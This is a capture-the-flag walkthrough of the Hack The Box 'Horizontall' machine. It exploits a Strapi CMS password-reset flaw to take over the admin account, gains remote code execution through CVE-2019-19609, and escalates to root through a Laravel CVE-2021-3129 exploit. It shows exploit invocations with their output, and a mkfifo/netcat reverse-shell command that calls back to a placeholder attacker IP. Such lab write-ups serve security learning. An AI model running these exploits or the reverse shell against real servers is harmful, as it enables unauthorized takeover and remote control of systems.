Alright, so among all the directories , the /admin was userful
It uses starpi cms
What's Starpi ?
Strapi is an open-source headless CMS used for building fast and easily manageable APIs written in JavaScript. It enables developers to make flexible API structures easily using a beautiful user interface. Strapi can be used with various databases including MongoDB, PostgreSQL, etc.
Starpi Version
I didn't found anything on the website that tells us the starpi version
So, I used feroxbuster again, to find sub directoires.
I found an intresting directory that gaves the starpi version used in the server ( http://api-prod.horizontall.htb/admin/init )
Public exploit link : https://www.exploit-db.com/exploits/50239
Download or copy the exploit to get login details
Login details :
└─$ python3 exploit.py http://api-prod.horizontall.htb 1 ⨯
[+] Checking Strapi CMS Version running[+] Seems like the exploit will work!!![+] Executingexploit[+] Password reset was successfully[+] Your email is: admin@horizontall.htb[+] Your new credentials are: admin:SuperStrongPassword1[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQzMjk1MDQ3LCJleHAiOjE2NDU4ODcwNDd9.FxVxaCiduAAdIqnIHvmox5o330ARzD1-Z7DPAPjxYdg
Login details : [ admin:SuperStrongPassword1 ]
User Shell
Exploit link for RCE : https://github.com/diego-tella/CVE-2019-19609-EXPLOIT
# TERMINAL 1 :# Setup a listener before using the exploit └─$ nc -nvlp 4444 1 ⨯
listeningon [any] 4444 ...# TERMINAL 2 :└─$ python3 rce.py -d api-prod.horizontall.htb -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQzMjk1NzczLCJleHAiOjE2NDU4ODc3NzN9.4aUFn0Cx5J5hpjbtY-RxS5TNPVjG101BMeGnY22XrCQ -l <YOUR_IP> -p 4444
Exploit used to get root priviliges : https://github.com/nth347/CVE-2021-3129_exploit
└─$python3root.pyhttp://127.0.0.1:8000Monolog/RCE1whoami[i] Trying to clear logs[+] Logs cleared[+] PHPGGC found. Generating payload and deploy it to the target[+] Successfully converted logs to PHAR[+] PHAR deserialized. Exploitedroot[i] Trying to clear logs[+] Logs cleared
Root Flag
└─$ python3 root.py http://127.0.0.1:8000 Monolog/RCE1 "cat /root/root.txt" 1 ⨯
[i] Trying to clear logs[+] Logs cleared[+] PHPGGC found. Generating payload and deploy it to the target[+] Successfully converted logs to PHAR[+] PHAR deserialized. Exploitededaf3a8f9_<--SNIPPED-->[i] Trying to clear logs[+] Logs cleared
Root Shell (nc part)
Open nc connection on any port
└─$ python3 root.py http://127.0.0.1:8000 Monolog/RCE1 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <YOUR_IP> <PORT> >/tmp/f"
[i] Trying to clear logs[+] Logs cleared[+] PHPGGC found. Generating payload and deploy it to the target[+] Successfully converted logs to PHAR[i] There is no output
shell
└─$nc-nvlp6666listeningon [any] 6666 ...connectto [<YOUR_IP_WOULD_BE_HERE>] from (UNKNOWN) [10.10.11.105] 34418sh:0:can't access tty; job control turned off# iduid=0(root) gid=0(root) groups=0(root)